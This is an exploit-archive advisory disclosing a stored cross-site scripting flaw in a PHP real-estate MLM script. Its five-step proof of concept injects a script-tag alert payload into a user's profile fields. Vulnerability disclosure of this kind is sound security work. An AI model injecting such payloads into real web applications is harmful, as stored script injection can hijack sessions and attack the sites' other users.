id: 29729
date: 02/07/2018
title: Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Vulnerability
author: Prasenjit Kanti Paul
cves: 

######################################################################################
# Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
# Category: Web Application
# Version: =>3.0
# Tested on: Linux Mint
# CVE: NA
#######################################################################################
 
Proof of Concept
=================
1. Login as a user
2. Goto "Edit Profile"
3. Edit any field with "<script>alert("PKP")</script>"
4. Save Profile
5. You will be having a popup "PKP"

#  0day.today [2023-03-27]  #